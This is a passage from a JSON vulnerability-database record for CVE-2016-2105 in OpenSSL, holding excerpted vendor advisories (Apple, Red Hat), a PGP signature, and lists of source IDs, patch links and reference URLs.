improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A user\u0027s password may be visible on screen\nDescription: An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local application may be able to access the process list\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nThis release includes bug fixes and enhancements, as well as a new release\nof OpenSSL that addresses a number of outstanding security flaws. For\nfurther information, see the knowledge base article linked to in the\nReferences section. \n(CVE-2016-2108)\n\n* Multiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3195)\n\n* A flaw was found in the way the TLS protocol composes the Diffie-Hellman\nexchange (for both export and non-export grade cipher suites). An attacker\ncould use this flaw to downgrade a DHE connection to use export-grade key\nsizes, which could then be broken by sufficient pre-computation. This can\nlead to a passive man-in-the-middle attack in which the attacker is able to\ndecrypt all traffic. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). (CVE-2016-2109)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update)", "sources": [ { "db": "NVD", "id": "CVE-2016-2105" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "BID", "id": "89757" }, { "db": "VULHUB", "id": "VHN-90924" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" } ], "trust": 2.34 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-90924", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-90924" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2105", "trust": 3.2 }, { "db": "BID", "id": "89757", "trust": 2.0 }, { "db": "BID", "id": "91787", "trust": 1.7 }, { "db": "SECTRACK", "id": "1035721", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10160", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "136912", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-18", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU93163809", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU94844193", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-002472", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201605-081", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "143513", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136895", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138471", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138472", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136893", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136919", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139379", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-90924", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139167", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139116", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-90924" }, { "db": "BID", "id": "89757" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "139167" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "CNNVD", "id": "CNNVD-201605-081" }, { "db": "NVD", "id": "CVE-2016-2105" } ] }, "id": "VAR-201605-0075", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-90924" } ], "trust": 0.5305209371428571 }, "last_update_date": "2024-07-23T20:50:28.659000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206903" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206903" }, { "title": "HPSBMU03691", "trust": 0.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "title": "SB10160", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "title": "NV16-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv16-015.html" }, { "title": "Major changes between OpenSSL 1.0.1s and OpenSSL 1.0.1t [3 May 2016]", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Major changes between OpenSSL 1.0.2g and OpenSSL 1.0.2h [3 May 2016]", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Avoid overflow in EVP_EncodeUpdate", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=5b814481f3573fa9677f3a31ee51322e2a22ee6a" }, { "title": "EVP_EncodeUpdate overflow (CVE-2016-2105)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "title": "openSUSE-SU-2016:1566", "trust": 0.8, "url": "https://lists.opensuse.org/opensuse-security-announce/2016-06/msg00019.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Linux Bulletin - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "title": "Oracle Linux Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "title": "RHSA-2016:0722", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "title": "RHSA-2016:0996", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "title": "SA40202", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759 " }, { "title": "TLSA-2016-14", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-14j.html" }, { "title": "HS16-023", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-023/index.html" }, { "title": "OpenSSL Fixes for integer overflow vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=61406" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "CNNVD", "id": "CNNVD-201605-081" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-190", "trust": 1.1 }, { "problemtype": "CWE-189", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-90924" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "NVD", "id": "CVE-2016-2105" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.securityfocus.com/bid/89757" }, { "trust": 2.3, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 2.3, "url": "http://www.debian.org/security/2016/dsa-3566" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 2.0, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "trust": 2.0, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-2073.html" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa123" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05320149" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20160504-0001/" }, { "trust": 1.7, "url": "https://source.android.com/security/bulletin/pixel/2017-11-01" }, { "trust": 1.7, "url": "https://support.apple.com/ht206903" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-18" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183457.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183607.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/184605.html" }, { "trust": 1.7, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:17.openssl.asc" }, { "trust": 1.7, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-1648.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-1649.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-1650.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035721" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00008.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00010.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00011.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00029.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00036.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00055.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00013.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00014.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00016.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00018.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00019.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00030.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00019.html" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2959-1" }, { "trust": 1.6, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us" }, { "trust": 1.6, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us" }, { "trust": 1.6, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "trust": 1.6, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103" }, { "trust": 1.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.0, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=5b814481f3573fa9677f3a31ee51322e2a22ee6a" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu93163809/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu94844193/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2105" }, { "trust": 0.8, "url": "http://www.aratana.jp/security/detail.php?id=16" }, { "trust": 0.7, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=5b814481f3573fa9677f3a31ee51322e2a22ee6a" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2016/may/25" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024319" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021361" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/56?aspxautodetectcookiesupport=1" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988007" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21982823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982949" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983514" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983555" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984323" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984609" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985736" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985981" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986068" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986123" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986152" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986260" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987707" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987968" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988189" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988350" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988383" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989046" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992493" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000192" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10759" }, { "trust": 0.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03756en_us" }, { "trust": 0.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03765en_us" }, { "trust": 0.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10160" }, { "trust": 0.1, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2016\u0026amp;m=slackware-security.542103" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4599" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4601" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4600" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1865" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4596" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4447" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1863" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4582" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4595" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1864" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9862" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4607" }, { "trust": 